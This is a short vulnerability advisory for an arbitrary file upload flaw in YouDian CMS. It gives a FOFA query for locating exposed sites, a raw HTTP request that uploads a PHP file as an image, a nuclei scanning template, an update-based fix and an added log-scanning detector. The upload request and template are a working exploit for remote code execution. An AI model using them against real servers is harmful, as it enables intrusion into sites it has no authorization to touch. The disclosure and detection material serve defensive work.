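YouDian CMS (友点CMS) has an arbitrary file upload vulnerability. An attacker can exploit it to upload a malicious file and gain server privileges.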
CVE | CNVD | CNNVD |
---|---|---|
- | - | - |
Name | Version |
---|---|
- |
FOFA: app="友点建站-CMS" && product="友点建站-CMS"
```http
POST /Public/ckeditor/plugins/multiimage/dialogs/image_upload.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Content-Length: 185
Accept: */*
Accept-Encoding: gzip, deflate, br
Connection: close
Content-Type: multipart/form-data; boundary=cadc403efc1ad12f5fcce44c172baad2

--cadc403efc1ad12f5fcce44c172baad2
Content-Disposition: form-data; name="files"; filename="c.php"
Content-Type: image/jpg

<?php phpinfo();?>
--cadc403efc1ad12f5fcce44c172baad2--
```
http://127.0.0.1/Public/image/uploads/1709524862134.php
nuclei template
```yaml
id: YouDianCMS-upload

info:
  name: YouDianCMS-upload
  author: test
  severity: info
  description: description
  reference:
    - https://
  tags: tags

http:
  - raw:
      - |
        POST /Public/ckeditor/plugins/multiimage/dialogs/image_upload.php HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
        Accept-Encoding: gzip, deflate, br
        Accept: */*
        Connection: close
        Content-Type: multipart/form-data; boundary=cadc403efc1ad12f5fcce44c172baad2
        Host: {{Hostname}}
        Content-Length: 179

        --cadc403efc1ad12f5fcce44c172baad2
        Content-Disposition: form-data; name="files"; filename="c.php"
        Content-Type: image/jpg

        <?php phpinfo();?>
        --cadc403efc1ad12f5fcce44c172baad2--

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          -
      - type: status
        status:
          - 200
```
Update to the latest version.
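A log check a defender could run alongside the update, as an added example that is not part of the original post: it flags POSTs to the upload endpoint and requests for script files under the upload directory shown above, and marks script requests that come from an address that previously posted to the endpoint. The combined log format, the script-extension list and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Paths taken from the request and the resulting URL shown on this page.
UPLOAD_ENDPOINT = "/Public/ckeditor/plugins/multiimage/dialogs/image_upload.php"
UPLOAD_DIR = "/Public/image/uploads/"
# Assumption: extensions the web server hands to the PHP interpreter.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)
# Assumption: access log in Apache/nginx "combined" format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Constructed sample log lines (documentation address ranges only).
SAMPLE_LOG = """\
198.51.100.7 - - [04/Mar/2024:04:01:02 +0000] "POST /Public/ckeditor/plugins/multiimage/dialogs/image_upload.php HTTP/1.1" 200 64 "-" "Mozilla/5.0"
198.51.100.7 - - [04/Mar/2024:04:01:05 +0000] "GET /Public/image/uploads/1709524862134.php HTTP/1.1" 200 81234 "-" "Mozilla/5.0"
192.0.2.10 - - [04/Mar/2024:04:02:00 +0000] "GET /Public/image/uploads/1709524000000.jpg HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.10 - - [04/Mar/2024:04:03:00 +0000] "GET /index.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"
203.0.113.5 - - [04/Mar/2024:04:04:00 +0000] "GET /Public/image/uploads/a.PHP?x=1 HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""

def scan(lines):
    """Return findings as dicts: rule, ip, path, status, correlated."""
    findings, uploaders = [], set()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        path = unquote(m["target"].split("?", 1)[0])
        ip, status = m["ip"], int(m["status"])
        rule = None
        if m["method"] == "POST" and path == UPLOAD_ENDPOINT:
            rule = "post-to-upload-endpoint"
            if status == 200:
                uploaders.add(ip)  # remember who uploaded successfully
        elif path.startswith(UPLOAD_DIR) and SCRIPT_EXT.search(path):
            rule = "script-requested-from-upload-dir"
        if rule:
            findings.append({"rule": rule, "ip": ip, "path": path, "status": status,
                             "correlated": rule.startswith("script") and ip in uploaders})
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG.splitlines()):
        print(finding)
```

A correlated finding with status 200 means a script in the upload directory was served to the same client that uploaded, which warrants checking that directory for files with script extensions.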
https://mp.weixin.qq.com/s/oiNffCThHJsfLhePlZjTBA